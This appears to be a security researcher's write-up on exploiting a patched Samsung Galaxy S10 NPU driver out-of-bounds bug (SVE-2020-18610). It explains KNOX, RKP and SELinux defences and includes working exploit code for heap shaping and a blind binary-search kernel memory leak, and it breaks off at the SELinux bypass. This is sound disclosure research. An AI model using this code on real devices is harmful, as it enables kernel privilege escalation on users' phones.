Skip to content

Latest commit

 

History

History
1263 lines (922 loc) · 42.8 KB

Galaxy's Meltdown - Exploiting SVE-2020-18610.md

File metadata and controls

1263 lines (922 loc) · 42.8 KB

Basic

Although Google Project Zero released blog article about Samsung Galaxy's NPU bug which is same bug we found before, we also open our write-up about this bug with different exploit methodology. As the vulnerability is very simple, we focus on how to getting AAR/AAW and how to bypass Samsung Galaxy's mitigaitons like SELinux and KNOX. Our work is done on Samsung Galaxy S10, and may work on Samsung Galaxy S20.

Before starting our exploit journey, we need to know basic concepts about Samsung Galaxy's internal stuffs. TL;DR :)

Samsung Galaxy's kernel mitigations

Samsung Galaxy implements their own security mechanism based on Android ecosystem.

Let's take a brief look at the biggest obstacles - KNOX and SELinux.

KNOX

KNOX is security mechanism in Samsung Galaxy, which introduced many mitigations like DM-verify, KAP, PKM and etc). to prevent android kernel from Local Privilege Escalation.

The important things in KNOX mechanism are RKP(Real-time Kernel Protection) and DFI(Data Flow Integrity).

The RKP is implemented in secure world which can be TrustZone or Hypervisor.

RKP provides many functionalities like preventing unauthorized privileged code from untrusted source, preventing direct access from userspace and verifying important kernel data integrity.

The DFI protects root related data like init_cred, page table entries and etc). by allocating those objects in RKP protected read-only region, so even if attacker has AAW(Arbitrary Address Write) primitive, he can't modify these data.

struct cred init_cred __kdp_ro = {
	.usage			= ATOMIC_INIT(4),
#ifdef CONFIG_DEBUG_CREDENTIALS
	.subscribers		= ATOMIC_INIT(2),
	.magic			= CRED_MAGIC,
#endif
	.uid			= GLOBAL_ROOT_UID,
	.gid			= GLOBAL_ROOT_GID,
	.suid			= GLOBAL_ROOT_UID,
  
  ...

Therefore, to modify these data, RKP provides unique function called rkp_call/uh_call to change the protected data.

Of course, the attacker can think about abusing that function to acheive their goal. The question is that is it possible?

The answer is you can't simply abuse it now. Because currently all RKP functions do data integrity check internally.

// kernel/cred.c
void __put_cred(struct cred *cred)
{
	kdebug("__put_cred(%p{%d,%d})", cred,
	       atomic_read(&cred->usage),
	       read_cred_subscribers(cred));

#ifdef CONFIG_RKP_KDP
	if (rkp_ro_page((unsigned long)cred))
		BUG_ON((rocred_uc_read(cred)) != 0);
	else
#endif /*CONFIG_RKP_KDP*/
    
...

// fs/exec.c
#define RKP_CRED_SYS_ID 1000

static int is_rkp_priv_task(void)
{
	struct cred *cred = (struct cred *)current_cred();

	if(cred->uid.val <= (uid_t)RKP_CRED_SYS_ID || cred->euid.val <= (uid_t)RKP_CRED_SYS_ID ||
		cred->gid.val <= (gid_t)RKP_CRED_SYS_ID || cred->egid.val <= (gid_t)RKP_CRED_SYS_ID ){
		return 1;
	}
	return 0;
}

As the example like above code snippet, when installing new credential by calling commit_creds() function, it calls __put_cred() function internally. When __put_cred() function calls some rkp_call/uh_call, HyperVisor/TrustZone will check whether the process credential is in a RKP protected read-only memory area and check whether the process id is If it is greater than 1000.

So, trying to forge task_struct->cred member is no more valid now.

Also, usually linux kernel attackers abused ptmx_fops to get arbitrary function call primitive, because ptmx_fops is can be overwrote by the attacker. Therefore it's great target to make arbitrary function call primitive.

But, due to RKP, every fops structures in Samsung Galaxy kernel including ptmx_fops reside in read-only region, attackers can't use old-way, so they must find other way to getting reliable arbitrary function call primitive.

SELinux

Prior to Android 4.3, google used application sandboxes as android security model. But, after Android 5.0, SELinux is main security mechanism in Android system, and is fully enforced by default.

On google NEXUS and PIXEL series, SELinux policy is controlled by 1 global variable named selinux_enforcing in kernel space which is writable variable. Thus, if selinux_enforcing is false, SELinux doesn't work on those android system.

However, Samsung Galaxy's SELinux policy doesn't rely on selinux_enforcing, because they customized SELinux policy to harden original SELinux's weakness. Based on the original permission management of SELinux, following code snippet shows that an additional integrity check is added to almost all system call interfaces.

struct cred {
  ...
#ifdef CONFIG_RKP_KDP
	atomic_t *use_cnt;
	struct task_struct *bp_task;
	void *bp_pgd;
	unsigned long long type;
#endif /*CONFIG_RKP_KDP*/
} __randomize_layout;

At first, in cred structure, there are members like bp_task and bp_pgd for SELinux's security_integrity_current function. When new credential is commitied or overrided in secure world, RKP records it's owner information in bp_task and PGD information in bp_pgd.

// security/security.c
#define call_void_hook(FUNC, ...)				\
	do {							\
		struct security_hook_list *P;			\
								\
		if(security_integrity_current()) break;	\
		list_for_each_entry(P, &security_hook_heads.FUNC, list)	\
			P->hook.FUNC(__VA_ARGS__);		\
	} while (0)

#define call_int_hook(FUNC, IRC, ...) ({			\
	int RC = IRC;						\
	do {							\
		struct security_hook_list *P;			\
								\
		RC = security_integrity_current();		\
		if (RC != 0)							\
			break;								\
		list_for_each_entry(P, &security_hook_heads.FUNC, list) { \
			RC = P->hook.FUNC(__VA_ARGS__);		\
			if (RC != 0)				\
				break;				\
		}						\
	} while (0);						\
	RC;							\
})

...
  
// security/selinux/hooks.c
int security_integrity_current(void)
{
	rcu_read_lock();
	if ( rkp_cred_enable && 
		(rkp_is_valid_cred_sp((u64)current_cred(),(u64)current_cred()->security)||
		cmp_sec_integrity(current_cred(),current->mm)||
		cmp_ns_integrity())) {
		rkp_print_debug();
		rcu_read_unlock();
		panic("RKP CRED PROTECTION VIOLATION\n");
	}
	rcu_read_unlock();
	return 0;
}

If CONFIG_RKP_KDP is enabled, security_integrity_current function works, which is function to verify cred security context of a process. Simply said, it will do following things.

  1. Whether the cred and security in the process descriptor are allocated in the RKP protected read-only memory area.
  2. Whether bp_cred and cred are consistent to prevent being modified.
  3. Whether bp_task is the process.
  4. Whether mm->pgd and cred->bp_pgd are consistent
  5. Whether current->nsproxy->mnt_ns->root and current->nsproxy->mnt_ns->root ->mnt->bp_mount is consistent.

And also Samsung puts SELinux related data like cred->security, task_security_struct and selinux_ops on RKP protected read-only memory region to prevent data forgery via AAW primitive by attacker.

Those things are brief overview of what Samsung's customized SELinux do.

In addition to SELinux's behavior, SELinux is also important measure as vulnerability market's perspective because it is used to estimate bugs value in android system.

For example, if some bug can be triggered in "isolated_app" context, it is generally more valuable then the bug which can be only triggered in "untrusted_app" context.

We can check this information by following commands.

adb pull /sys/fs/selinux/policy
sesearch --allow policy |  grep -v "magisk" |  grep "isolated_app"

Previously released Samsung Galaxy exploitation

Previous KNOX bypass exploitations are well described in x82's slide at POC 2019.

There are several published articles in online, let's take a quick look at them.

KNOX 2.6 (Samsung Galaxy S7)

In blackhat USA 2017 slide from KeenLab, they published new way to bypass DFI and SELinux.

At first, they called rkp_override_creds to override own cred with some tricky way (i don't know what this tricky way is), even if RKP do uid_checking inside rkp_override_creds. Then, they used orderly_poweroff function with modified poweroff_cmd to call call_usermodehelper to create privileged process. So, after getting privileged process which has full root capabilities, they call rkp_override_creds to change its cred information.

Even if newly created process has full root capabilities, due to SELinux, it has limited access to full filesystem.

KNOX 2.8 (Samsung Galaxy S8)

Calling __orderly_poweroff() is patched with uid and binary path verification in load_elf_binary().

static int kdp_check_sb_mismatch(struct super_block *sb) 
{	
	if(is_recovery || __check_verifiedboot) {
		return 0;
	}
	if((sb != rootfs_sb) && (sb != sys_sb)
		&& (sb != odm_sb) && (sb != vendor_sb) && (sb != art_sb)) {
		return 1;
	}
	return 0;
}

static int invalid_drive(struct linux_binprm * bprm) 
{
	struct super_block *sb =  NULL;
	struct vfsmount *vfsmnt = NULL;
	
	vfsmnt = bprm->file->f_path.mnt;
	if(!vfsmnt || 
		!rkp_ro_page((unsigned long)vfsmnt)) {
		printk("\nInvalid Drive #%s# #%p#\n",bprm->filename, vfsmnt);
		return 1;
	} 
	sb = vfsmnt->mnt_sb;

	if(kdp_check_sb_mismatch(sb)) {
		printk("\nSuperblock Mismatch #%s# vfsmnt #%p#sb #%p:%p:%p:%p:%p:%p#\n",
					bprm->filename, vfsmnt, sb, rootfs_sb, sys_sb, odm_sb, vendor_sb, art_sb);
		return 1;
	}

	return 0;
}

#define RKP_CRED_SYS_ID 1000
static int is_rkp_priv_task(void)
{
	struct cred *cred = (struct cred *)current_cred();

	if(cred->uid.val <= (uid_t)RKP_CRED_SYS_ID || cred->euid.val <= (uid_t)RKP_CRED_SYS_ID ||
		cred->gid.val <= (gid_t)RKP_CRED_SYS_ID || cred->egid.val <= (gid_t)RKP_CRED_SYS_ID ){
		return 1;
	}
	return 0;
}
#endif

int flush_old_exec(struct linux_binprm * bprm)
{
	...
#ifdef CONFIG_RKP_NS_PROT
	if(rkp_cred_enable &&
		is_rkp_priv_task() && 
		invalid_drive(bprm)) {
		panic("\n KDP_NS_PROT: Illegal Execution of file #%s#\n", bprm->filename);
	}
#endif /*CONFIG_RKP_NS_PROT*/
  ...

As you can see, if caller's uid is under 1000, it will check whether mount point is in RKP protected space. But these verifications are not added to load_script(), so attacker can still run arbitrary root script instead of binary.

All of above techniques is patched now, so new way is required to bypass Samsung Galaxy's custom SELinux and KNOX .

NPU Driver

The NPU was installed from the exynos 9820 series, which means every Samsung Galaxy devices after the exynos 9820 have NPU kernel driver.

Before the vulnerability is patched, this driver can be accessed by untrusted_app (Chromium Browser, Normal App, ...), but after Samsung security update at NOV, 2020, untrutsted_app is also restricted by new selinux policy.

We can use NPU driver simply by opening /dev/vertex10, and this driver provides various ioctl commands for user.

long vertex_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
{
	int ret = 0;
	struct vision_device *vdev = vision_devdata(file);
	const struct vertex_ioctl_ops *ops = vdev->ioctl_ops;

	/* temp var to support each ioctl */
	union {
		struct vs4l_graph vsg;
		struct vs4l_format_list vsf;
		struct vs4l_param_list vsp;
		struct vs4l_ctrl vsc;
		struct vs4l_container_list vscl;
	} vs4l_kvar;

	switch (cmd) {
	case VS4L_VERTEXIOC_S_GRAPH:
		ret = get_vs4l_graph64(&vs4l_kvar.vsg,
				(struct vs4l_graph __user *)arg);
		if (ret) {
			vision_err("get_vs4l_graph64 (%d)\n", ret);
			break;
		}

		ret = ops->vertexioc_s_graph(file, &vs4l_kvar.vsg);
		if (ret)
			vision_err("vertexioc_s_graph is fail(%d)\n", ret);

		put_vs4l_graph64(&vs4l_kvar.vsg,
				(struct vs4l_graph __user *)arg);
		break;

	case VS4L_VERTEXIOC_S_FORMAT:
		ret = get_vs4l_format64(&vs4l_kvar.vsf,
				(struct vs4l_format_list __user *)arg);
		if (ret) {
			vision_err("get_vs4l_format64 (%d)\n", ret);
			break;
		}

		ret = ops->vertexioc_s_format(file, &vs4l_kvar.vsf);
		if (ret)
			vision_err("vertexioc_s_format (%d)\n", ret);

		put_vs4l_format64(&vs4l_kvar.vsf,
				(struct vs4l_format_list __user *)arg);
		break;
      
...

Although there are more NPU ioctl commands, we focus on only 2 commands named �VS4L_VERTEXIOC_S_GRAPH and VS4L_VERTEXIOC_S_FORMAT, Because the vulnerability we used is in VS4L_VERTEXIOC_S_GRAPH command, and VS4L_VERTEXIOC_S_FORMAT command is used for out-of-bound read/write.

const struct vertex_ioctl_ops npu_vertex_ioctl_ops = {
	.vertexioc_s_graph      = npu_vertex_s_graph,
	.vertexioc_s_format     = npu_vertex_s_format,
	.vertexioc_s_param      = npu_vertex_s_param,
	.vertexioc_s_ctrl       = npu_vertex_s_ctrl,
	.vertexioc_qbuf         = npu_vertex_qbuf,
	.vertexioc_dqbuf        = npu_vertex_dqbuf,
	.vertexioc_prepare      = npu_vertex_prepare,
	.vertexioc_unprepare    = npu_vertex_unprepare,
	.vertexioc_streamon     = npu_vertex_streamon,
	.vertexioc_streamoff    = npu_vertex_streamoff
};

Functions like get_vs4l_graph64 is just wrapper of copy_from_user, so we just need to focus on vertexioc_s_graph and vertexioc_s_format. These functions are defined in drivers/vision/npu/npu-vertex.c.

int npu_session_s_graph(struct npu_session *session, struct vs4l_graph *info)
{
	int ret = 0;
	BUG_ON(!session);
	BUG_ON(!info);
	ret = __get_session_info(session, info);
	if (unlikely(ret)) {
		npu_uerr("invalid in __get_session_info\n", session);
		goto p_err;
	}
	ret = __config_session_info(session);
	if (unlikely(ret)) {
		npu_uerr("invalid in __config_session_info\n", session);
		goto p_err;
	}
	return ret;
p_err:
	npu_uerr("Clean-up buffers for graph\n", session);
	return ret;
}

At first, npu_session_s_graph calls __get_session_info to map corresponding ION fd. As following code snippet shows, one thing you should remember is that vmalloc is used in this map operation.

void *ion_heap_map_kernel(struct ion_heap *heap,
			  struct ion_buffer *buffer)
{
	...
  
	int npages = PAGE_ALIGN(buffer->size) / PAGE_SIZE;
	struct page **pages = vmalloc(sizeof(struct page *) * npages);

  ...

	return vaddr;
}

Then, __config_session_info is called to config npu_session by parsing user supplied data.

int __config_session_info(struct npu_session *session)
{
	...

	ret = __pilot_parsing_ncp(session, &temp_IFM_cnt, &temp_OFM_cnt, &temp_IMB_cnt, &WGT_cnt);

  ...
    
	ret = __second_parsing_ncp(session, &temp_IFM_av, &temp_OFM_av, &temp_IMB_av, &WGT_av);

struct npu_session consists of various members, but one important member is ncp_mem_buf.

struct npu_memory_buffer {
	struct list_head		list;
	struct dma_buf			*dma_buf;
	struct dma_buf_attachment	*attachment;
	struct sg_table			*sgt;
	dma_addr_t			daddr;
	void				*vaddr;
	size_t				size;
	int				fd;
};

...

struct npu_session {
	...
	struct npu_memory_buffer *ncp_mem_buf;
	...
};

ncp_mem_buf->vaddr is vmalloc'ed region which is returned from ion_heap_map_kernel, and user can insert data into that region by mmaping ION's DMA file descriptor. So, each parameters like temp_IFM_cnt, tmp_IFM_av is initialized by user data.

ION allocator

ION allocator is memory pool manager which allocates some sharable memory buffer between userspace, kernel, and co-processors. Main usage of ION allocator is to allocate DMA buffer and share that memory with various hardware components.

// drivers/staging/android/uapi/ion.h (Samsung Galaxy kernel source)

enum ion_heap_type {
	ION_HEAP_TYPE_SYSTEM,
	ION_HEAP_TYPE_SYSTEM_CONTIG,
	ION_HEAP_TYPE_CARVEOUT,
	ION_HEAP_TYPE_CHUNK,
	ION_HEAP_TYPE_DMA,
	ION_HEAP_TYPE_CUSTOM, /*
			       * must be last so device specific heaps always
			       * are at the end of this enum
			       */
	ION_HEAP_TYPE_CUSTOM2,
	ION_HEAP_TYPE_HPA = ION_HEAP_TYPE_CUSTOM,
};

...

struct ion_allocation_data {
	__u64 len;
	__u32 heap_id_mask;
	__u32 flags;
	__u32 fd;
	__u32 unused;
};

There are 2 important structures for ION allocator. struct ion_allocation_data is for userspace ioctl command to allocate ION buffer, fd member is set if allocation is successful.

enum ion_heap_type is used to create specific type of memory pool in initialization phase.

Userspace application can use ION allocator via /dev/ion interface like following code.

The heap_id_mask member in ion_allocation_data is used to select specific ION memory we need.

int prepare_ion_buffer(uint64_t size) {
	int kr;
  int ion_fd = open("/dev/ion", O_RDONLY);
  struct ion_allocation_data data;
  memset(&data, 0, sizeof(data));

  data.allocation.len = size;
  data.allocation.heap_id_mask = 1 << 1;
  data.allocation.flags = ION_FLAG_CACHED;
  if ((kr = ioctl(ion_fd, ION_IOC_ALLOC, &data)) < 0) {
      return kr;
  }

  return data.allocation.fd;
}

...

void work() {
  int dma_fd = prepare_ion_buffer(0x1000);
  void *ion_buffer = mmap(NULL, 0x7000, PROT_READ|PROT_WRITE, MAP_SHARED, dma_fd, 0);
}

In our NPU case, allocated ION buffer is used in ion_heap_map_kernel to synchronize with NPU device.

And by mmaping data.allocation.fd, that ION buffer is also sychronized to userspace buffer.

Vulnerability

The vulnerability exists both on __pilot_parsing_ncp and __second_parsing_ncp functions.

int __second_parsing_ncp(
	struct npu_session *session,
	struct temp_av **temp_IFM_av, struct temp_av **temp_OFM_av,
	struct temp_av **temp_IMB_av, struct addr_info **WGT_av)
{
	u32 address_vector_offset;
	u32 address_vector_cnt;
	u32 memory_vector_offset;
	u32 memory_vector_cnt;
	...
	struct ncp_header *ncp;
	struct address_vector *av;
	struct memory_vector *mv;
	...
	char *ncp_vaddr;
  ...
	ncp_vaddr = (char *)session->ncp_mem_buf->vaddr;
	ncp = (struct ncp_header *)ncp_vaddr;
	...
	address_vector_offset = ncp->address_vector_offset;
	address_vector_cnt = ncp->address_vector_cnt;
	...
	memory_vector_offset = ncp->memory_vector_offset;
	memory_vector_cnt = ncp->memory_vector_cnt;
	...
	mv = (struct memory_vector *)(ncp_vaddr + memory_vector_offset);
	av = (struct address_vector *)(ncp_vaddr + address_vector_offset);
	...
	for (i = 0; i < memory_vector_cnt; i++) {
		u32 memory_type = (mv + i)->type;
		u32 address_vector_index;
		u32 weight_offset;

		switch (memory_type) {
		case MEMORY_TYPE_IN_FMAP:
			{
				address_vector_index = (mv + i)->address_vector_index;
				if (!EVER_FIND_FM(IFM_cnt, *temp_IFM_av, address_vector_index)) {
					(*temp_IFM_av + (*IFM_cnt))->index = address_vector_index;
					(*temp_IFM_av + (*IFM_cnt))->size = (av + address_vector_index)->size;
					(*temp_IFM_av + (*IFM_cnt))->pixel_format = (mv + i)->pixel_format;
					(*temp_IFM_av + (*IFM_cnt))->width = (mv + i)->width;
					(*temp_IFM_av + (*IFM_cnt))->height = (mv + i)->height;
					(*temp_IFM_av + (*IFM_cnt))->channels = (mv + i)->channels;
          ...

But very critical out-of-bound read/write vulnerability occurs in __second_parsing_ncp function. As we said above section, session->ncp_mem_buf->vaddr consists of userdata.

So, address_vector_offset, address_vector_cnt, memory_vector_offset and memory_vector_cnt are initialized by our data. As variable name implies, address_vector_offset and memory_vector_offset are used to calculate each vector memory address.

But as there are no bound check, we can make mv and av point to arbitrary region in kernel space, and by using mv and av, we can fill temp_IFM_av with some unknown values in out of bound range.

Getting AAR/AAW

Now, we have out-of-bound read/write, but how to make this to AAR/AAW primitives?

At first, we need to know where we are to identify what objects in kernel we can read/write. As ION buffer is mapped to NPU session via vmalloc and out of bound vulnerability occur in this region, we need to know vmalloc's allocation algorithm and what object is allocated via vmalloc.

vmalloc?

In kernal, there are 2 main memory allocation APIs.

  • kmalloc
  • vmalloc

Main difference between kmalloc and vmalloc is physical memory's continuity. The memory allocated by kmalloc is in physically contiguous memory and also in virtually contiguous memory. In the other hand, vmalloc allocates memory to virtually contiguous memory, but each pages are fragmented in physical memory.

Very important feature in vmalloc is that vmalloc can allocate guard page.

// kernel/fork.c
static unsigned long *alloc_thread_stack_node(struct task_struct *tsk, int node)
{
#ifdef CONFIG_VMAP_STACK
	void *stack;
	...
	stack = __vmalloc_node_range(THREAD_SIZE, THREAD_ALIGN,
				     VMALLOC_START, VMALLOC_END,
				     THREADINFO_GFP,
				     PAGE_KERNEL,
				     0, node, __builtin_return_address(0));
  ...

As THREAD_SIZE is (1 << 14) in ARM64, each kernel thread stack consists of 4K size. But each kernel thread stack has lead/tail guard page like following one to prevent the kernel from single overflow vulnerability.

So, when we tested this vulnerability early in this year, we realized that we have to shape heap to utilize this vulnerability. If we can successfully shape heap like following image, GUARD PAGE is not a hurdle to us because we have a powerful out-of-bound read/write!

Google Project Zero's Methodology

As we mentioned above, to successfully exploit this bug, we need to shape heap like above image. P0 used a bunch of binder file descriptors and uesr threads to shape heap. Detailed method and code can be found on P0's blog post.

Out of bounds addition

They directly used out-of-bound read/write in __second_parsing_ncp function.

In MEMORY_TYPE_WMASK case, they can make (av + address_vector_index)->m_addr point to out of bounds of the vmap-ed buffer. So, they can read/write an arbitrary out-of-bounds address beyond the ION buffer via (av + address_vector_index)->m_addr = weight_offset + ncp_daddr; statement.

int __second_parsing_ncp(
	struct npu_session *session,
	struct temp_av **temp_IFM_av, struct temp_av **temp_OFM_av,
	struct temp_av **temp_IMB_av, struct addr_info **WGT_av)
{
  		...
	    struct address_vector *av;
	    ...
	    address_vector_offset = ncp->address_vector_offset; /* u32 */
	    ...
	    av = (struct address_vector *)(ncp_vaddr + address_vector_offset);
	    ...
	    case MEMORY_TYPE_WMASK:
	    {
	        // update address vector, m_addr with ncp_alloc_daddr + offset
	        address_vector_index = (mv + i)->address_vector_index;
	        weight_offset = (av + address_vector_index)->m_addr;
	        if (weight_offset > (u32)session->ncp_mem_buf->size) {
	            ret = -EINVAL;
	            ...
	            goto p_err;
	        }
	        (av + address_vector_index)->m_addr = weight_offset + ncp_daddr;
	        ....

Of course, as their out-of-bounds addition primitive is restricted to ncp_daddr, one thing they should resolve is controlling ncp_daddr to get some desire value. Because the ncp_daddr is device address for ION buffer, they need to place ION buffer to the specific location with the specific size. They solved this problem by using ION heap type 5 with a lot of tests, which typically allocates device addresses from low to high.

Bypass KASLR

They choose pselect() system call to utilize copy_to_user() in kernel space. In pselect() system call, target thread task is blocked before doing copy_to_user(), thus, in main exploit thread, they modify the size parameter of copy_to_user().

int core_sys_select(int n, fd_set __user *inp, fd_set __user *outp,
			   fd_set __user *exp, struct timespec64 *end_time)
{
	...
	ret = do_select(n, &fds, end_time);
	...
	if (set_fd_set(n, inp, fds.res_in) ||
	    set_fd_set(n, outp, fds.res_out) ||
	    set_fd_set(n, exp, fds.res_ex))
    ...

Very interest thing in this part is that even if n comes from register, the n must be spilled to stack when do_select is blocked. So, if spilled n is modified by out-of-bound write vulnerability, corresponding number of bytes will be copied to userspace.

static inline unsigned long __must_check
set_fd_set(unsigned long nr, void __user *ufdset, unsigned long *fdset)
{
	if (ufdset)
		return __copy_to_user(ufdset, fdset, FDS_BYTES(nr));
	return 0;
}

Although some optimization, inlining issue and sanity checks in __copy_to_user() exist, they successfully got uninitialized kernel stack contents.

Hijack control flow

Controlling stack contents to do ROP is quite complex part. Simply said, they used pselect system call again, because when do_select() is blocked by poll_schedule_timeout(), n can be modified by their out-of-bounds primitive. So, when unblocked, for loop will run over the fds stack frame, stack contents will be overwritten.

static int do_select(int n, fd_set_bits *fds, struct timespec64 *end_time)
{
...
    retval = 0;
    for (;;) {
...
        inp = fds->in; outp = fds->out; exp = fds->ex;
        rinp = fds->res_in; routp = fds->res_out; rexp = fds->res_ex;
	//
        for (i = 0; i < n; ++rinp, ++routp, ++rexp) {
...
            in = *inp++; out = *outp++; ex = *exp++;
            all_bits = in | out | ex;
            if (all_bits == 0) {
                i += BITS_PER_LONG;
                continue;
            }
	//
            for (j = 0, bit = 1; j < BITS_PER_LONG; ++j, ++i, bit <<= 1) {
                struct fd f;
                if (i >= n)
                    break;
                if (!(bit & all_bits))
                    continue;
                f = fdget(i);
                if (f.file) {
...
                    if (f_op->poll) {
...
                        mask = (*f_op->poll)(f.file, wait);
                    }
                    fdput(f);
                    if ((mask & POLLIN_SET) && (in & bit)) {
                        res_in |= bit;
                        retval++;
...
                    }
...
                }
            }
            if (res_in)
                *rinp = res_in;
            if (res_out)
                *routp = res_out;
            if (res_ex)
                *rexp = res_ex;
            cond_resched();
        }
...
        if (retval || timed_out || signal_pending(current))
            break;
...
        if (!poll_schedule_timeout(&table, TASK_INTERRUPTIBLE,
                       to, slack))
            timed_out = 1;
    }
...
    return retval;
}

After getting ROP in kernel, they used eBPF system, because if we can pass arbitrary X1 register value to ___bpf_prog_run(), we can make arbitrary address read/write and kernel function call by executing a sequence of eBPF instructions.

Our Methodology

We also shaped heap like what P0 did, but instead of using binder's fd and user threads, we used fork() system call, because it also call vmalloc in kernel routine. As we developed this exploit on pure Samsung Galaxy S10 SM-973N, all informations we can get is from adb bugreport command.

...
  
atomic_int *wait_count;

int parent_pipe[2];
int child_pipe[2];
int trig_pipe[2];

void *read_sleep_func(void *arg){
    atomic_fetch_add(wait_count, 1);
    syscall(__NR_read, trig_pipe[0], 0x41414141, 0x13371337, 0x42424242, 0x43434343);

    return NULL;
}

...
  
int main(int argc, char *argv[]) {
  	...
    pipe(parent_pipe);
    pipe(child_pipe);
    pipe(trig_pipe);
  	...
    *wait_count = 0;
    int par_pid = 0;
    if (!(par_pid = fork())) {
        for (int i = 0; i < 0x2000; i++) {
            int pid = 0;
            if (!(pid = fork())){
                read_sleep_func(NULL);
                return 0;
            }
        }
        return 0;
    }
  	...
    if(leak(0xeec8) != 0x41414141){
        write(trig_pipe[1], "A", 1); // child process kill
        for (int i = ion_fd; i < 0x3ff; i++) {
            close(i);
        }
        munmap(ncp_page, 0x7000);
        goto retry;
    }
  	...

By very heuristic way that inspecting whether kernel crash occurs or not, we can finally place our child's kernel stack after the ION buffer..

Initial kernel memory leak

Even though there are various information leak vectors, we used VS4L_VERTEXIOC_S_FORMAT ioctl interface to call npu_session_format function in kernel space.

int npu_session_format(struct npu_queue *queue, struct vs4l_format_list *flist)
{
	...
	ncp_vaddr = (char *)session->ncp_mem_buf->vaddr;
	ncp = (struct ncp_header *)ncp_vaddr;

	address_vector_offset = ncp->address_vector_offset;
	address_vector_cnt = ncp->address_vector_cnt;

	memory_vector_offset = ncp->memory_vector_offset;
	memory_vector_cnt = ncp->memory_vector_cnt;

	mv = (struct memory_vector *)(ncp_vaddr + memory_vector_offset);
	av = (struct address_vector *)(ncp_vaddr + address_vector_offset);

	formats = flist->formats;

	if (flist->direction == VS4L_DIRECTION_IN) {
		FM_av = session->IFM_info[0].addr_info;
		FM_cnt = session->IFM_cnt;
	}
	...
	for (i = 0; i < FM_cnt; i++) {
		...
		bpp = (formats + i)->pixel_format;
		channels = (formats + i)->channels;
		width = (formats + i)->width;
		height = (formats + i)->height;
		cal_size = (bpp / 8) * channels * width * height;
    ...
#ifndef SYSMMU_FAULT_TEST
		if ((FM_av + i)->size > cal_size) {
			npu_uinfo("in_size(%zu), cal_size(%u) invalid\n", session, (FM_av + i)->size, cal_size);
			ret = NPU_ERR_DRIVER(NPU_ERR_SIZE_NOT_MATCH);
			goto p_err;
		}
#endif
	}
  ...

As (FM_av + i)->size points to some out of bound range value and cal_size consists of pure user supplied data, we can guess what value (FM_av + i)->size.

Some people can ask "how to guess (FM_av + i)->size's value? Because we can't get that value into userspace !".

Yeap. But even though we can't directly get kernel value into userspace application, we can guess it via binary search based on ioctl's return value. Like blind sql injection, if (FM_av + i)->size > cal_size is not satisfied, ioctl interface returns failure value to user. So, we can get kernel base and kernel stack address by using this method.

unsigned long long _leak(u32 off){
    int res;
    struct vs4l_format format;

leak_retry:
    fd_clear();
    if ((npu_fd = open("/dev/vertex10", O_RDONLY)) < 0){
        goto leak_retry;
    }

    memset(&format, 0, sizeof(format));

    format.stride = 0x0;
    format.cstride =  0x0;
    format.height = 1;
    format.width = 1;
    format.pixel_format = 8;

    unsigned long long g = (0xffffffff) / 2;
    unsigned long long  h = 0xffffffff;
    unsigned long long l = 1;

    ncp_page->memory_vector_offset = 0x200;
    ncp_page->memory_vector_cnt = 0x1;
    ncp_page->address_vector_offset = off;
    ncp_page->address_vector_cnt = 0x1;

    if (npu_graph_ioctl() < 0){
        close(npu_fd);
        fd_clear();
        npu_fd = -1;
        goto leak_retry;
    }

    unsigned long long old = g;
    format.channels = g;
    res = npu_format_ioctl(&format);
    while (1) {
        if (!res) {
            h = g - 1;
            g = (h + l)/2;
        } else {
            l = g + 1;
            g = (h + l) / 2;
            close(npu_fd);
            fd_clear();

            if ((npu_fd = open("/dev/vertex10", O_RDONLY)) < 0) {
                perror("open(\"/dev/vertext10\") : ");
                goto leak_retry;
            }

            ncp_page->memory_vector_offset = 0x200;
            ncp_page->memory_vector_cnt = 0x1;
            ncp_page->address_vector_offset = off;
            ncp_page->address_vector_cnt = 0x1;
            if (npu_graph_ioctl() < 0) {
                close(npu_fd);
                npu_fd = -1;
                goto leak_retry;
            }
        }
        if (old == g) {
            break;
        }
        old = g;
        memset(&format, 0, sizeof(format));
        format.stride = 0x0;
        format.cstride =  0x0;
        format.height = 1;
        format.width = 1;
        format.pixel_format = 8;
        format.channels = g;
        res = npu_format_test(&format);
    }
  
    close(npu_fd);
    npu_fd = -1;
    return g > 0 ? g+1 : 0;
}

Utilize out-of-bound read/write

Unlike P0, we don't have any restrictions for using out-of-bounds read/write, so our arbitrary address read/write and kernel function call are based on pure ROP.

As similar to P0's pselect() , read()/write() system call also blocked until target file descriptor is ready, so function arguments are spilled to stack. We can identify target function's stack frame like above signature value like 0x41414141. Using blocking mechanism in read/write with pipe file descriptor, we can use copy_to_user_fromio()/copy_from_user_toio() interactively with child process.

Getting Root Privilege?

As we mentioned early of this article, due to RKP, simply overwriting cred structure is not available in Samsung Galaxy devices. Therefore, to get root prilvilege, you can't use any old methods used in linux kernel or Google Nexus/Pixel kernel.

  • Can't overwrite cred structure.
  • Can't forge credential related structure.

But all we need now is root privileged code execution to bypass UID check for further exploitation. As most of previous exploit methods focused on forging current process's credential, people are obsessed with the method and don't seem to think of new way.

Although so many resources are protected by Samsung's security mechanism, task's kernel stack is writable. So, by traversing init process's task_struct, we can find any task's kernel stack !

we can get the task's stack address via void *stack member in task_struct structure. By modifying target task's kernel stack via AAW primitive, we can do ROP as other task's privilege. But, before doing ROP in target task, we need to bypass SELinux.

Bypass SELinux

As SELinux is default on every Android system now, even if attacker gets root privilege, what he can do depends on SELinux policy. In Google Android devices, if attacker successfully gets AAR/AAW primitives, SELinux can be easily bypassed by just overwriting selinux_enforcing to 0. But, following features are updated to Samsung's SELinux.

  • selinux_enforcing is now in kdp_ro section.

  • Disabling SELinux policy reloading.

  • Permissive domain is totally removed.

Samsung Galaxy S7

In KeenLab's Blackhat 2017 WP, they bypassed SELinux on Samsung Galaxy S7 by reloading SELinux policy. ss_initialized variable is not protected by RKP, they could overwrite ss_initialized to 0, which means SELinux is not initialized yet. After overwriting it, they reloaded SELinux policy by using libsepol API.

static struct sidtab sidtab;
struct policydb policydb;
#if (defined CONFIG_RKP_KDP && defined CONFIG_SAMSUNG_PRODUCT_SHIP)
int ss_initialized __kdp_ro;
#else
int ss_initialized;
#endif

But, in latest Samsung Galaxy kernel source, ss_initialized is protected by RKP, so above method can't be used anymore.

Samsung Galaxy S8

In IceSwordLab's Samsung Galaxy S8 rooting article, they overwrite security_hook_heads, because this variable is also not protected by RKP, which means it is read/write variable. But as follwoing code snippet shows, security_hook_heads is now in read-only protected.

// security/security.c
struct security_hook_heads security_hook_heads __lsm_ro_after_init;

Make SELinux policy reload again

